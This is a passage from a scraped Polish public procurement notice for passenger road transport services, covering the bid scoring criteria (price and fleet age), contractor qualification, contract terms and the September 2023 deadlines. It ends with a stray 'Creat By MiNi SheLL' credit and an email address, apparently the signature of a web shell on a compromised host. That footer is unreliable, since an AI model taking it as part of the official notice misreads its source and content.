wyprodukowanego w 2012 roku i wcześniej zamawiający odrzuci ofertę.<br/><br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w formularzu oferty – „Wykaz taboru”<br/><br/>W przypadku nie wypełnienia w formularzu oferty „ Wykaz taboru” odpowiedniej rubryki wskazującej na rok produkcji poszczególnych pojazdów Zamawiający uzna, że rokiem produkcji jest rok 2013 (jest to najstarszy dopuszczony rocznik pojazdu w OPZ) i nie przyzna punktów w tych pozycjach.<br/><br/>Za ofertę najkorzystniejszą zostanie uznana ta oferta, spośród ofert spełniających warunki określone w SWZ, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska największą liczbę punktów (P). <br/>Suma punktów w kryterium „A”, „B” wyliczana będzie według wzoru: <br/>P= A+B<br/>Gdzie:<br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”,<br/>B - liczba punktów przyznanych badanej ofercie w kryterium „Wiek taboru”.<br/><br/>3.	Maksymalnie oferta może uzyskać 100 pkt.<br/>4.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>5.	Do oceny ofert będą brane pod uwagę ceny oferty brutto.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wiek taboru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie przesłanek określonych w niniejszym rozdziale.<br/>2.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>dot. część 1-3<br/>Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca posiada licencję uprawniającą do podejmowania i wykonywania działalności gospodarczej w zakresie transportu drogowego, o której mowa w art. 4 ust. 17 ustawy z dnia 6 września 2001 roku o transporcie drogowym (t. j. Dz. U. 2022 r. poz. 2201 ze zm.).<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia Wykonawcy złożonego wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w tym zakresie;<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający nie określa warunku w tym zakresie.<br/>3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika <br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu <br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna zawierać wszystkie dokumenty wymienione w SWZ w następującym układzie:<br/>1)	wypełniony i podpisany przez osobę uprawnioną „Formularz oferty” – wg Załącznika nr 1 do SWZ;<br/>2)	oświadczenia i dokumenty, o których mowa w Rozdziale 7 ust. 2 i 3 SWZ:<br/>-	wypełniony i podpisany formularz oferty;<br/>-	oświadczenie, wg wzoru stanowiącego załącznik nr 4 do SWZ, o niepodleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale 6 SWZ;<br/>Oświadczenie składają odrębnie Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>-	oświadczenie wykonawców wspólnie ubiegających się o zamówienie (jeśli dotyczy);<br/>-	Dokumenty rejestrowe / pełnomocnictwo w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; <br/>-	Zastrzeżenie tajemnicy przedsiębiorstwa, o którym mowa w rozdz. 11 ust. 8 (jeżeli dotyczy);<br/>3)	informacje o których mowa w Rozdziale 13 ust. 11 SWZ i przedmiotowe środki dowodowe o których mowa w rozdziale 3 ust. 5 SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Zamawiający zbada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych Wykonawców. <br/>Szczegóły w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego – wzór umowy zawarty jest w załączniku nr 3 do SWZ -odpowiednio do danej części.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadkach opisanych w projektowanych postanowieniach umowy (załącznik nr 3 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną za pośrednictwem: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-01 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy z postępowania Wykonawcę wobec którego zachodzą przesłanki określone w art. 7 ust.1 pkt. 1-3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>2. Zamówienie będzie realizowane przez okres 12 miesięcy licząc od dnia podpisania umowy lub do wyczerpania kwoty, w zależności od tego, które zdarzenie nastąpi jako pierwsze, jednak nie wcześniej niż od 7 listopada 2023 r. (dot. część 1 - 3).<br/>3.Wybrany w drodze niniejszego postępowania Wykonawca winien przed podpisaniem umowy złożyć Zamawiającemu: <br/>1)	informacje niezbędne do wypełnienia treści umowy na wezwanie Zamawiającego;<br/>2)	opłaconą i aktualną polisę OC wraz z dowodem zapłacenia wymaganej składki, bądź raty składki ubezpieczeniowej, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z Przedmiotem zamówienia na cały okres realizacji zamówienia;<br/>3)	licencję uprawniające do podejmowania i wykonywania działalności gospodarczej w zakresie transportu drogowego, o której mowa w ustawie z dnia 6 września 2001 roku o transporcie drogowym (j.t. Dz. U. 2022 r. poz. 2201 ze zm.);<br/>4)	wykaz taboru, którym będą świadczone usługi – minimalne informacje: marka, model, rok produkcji, ilość miejsc siedzących – zgodnie z zaoferowanym w formularzu ofertowym taborem w ramach kryterium oceny ofert „wiek taboru”.<br/>5)	ewentualny wykaz podwykonawców.<br/>4.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu kopię umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Szczegóły w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com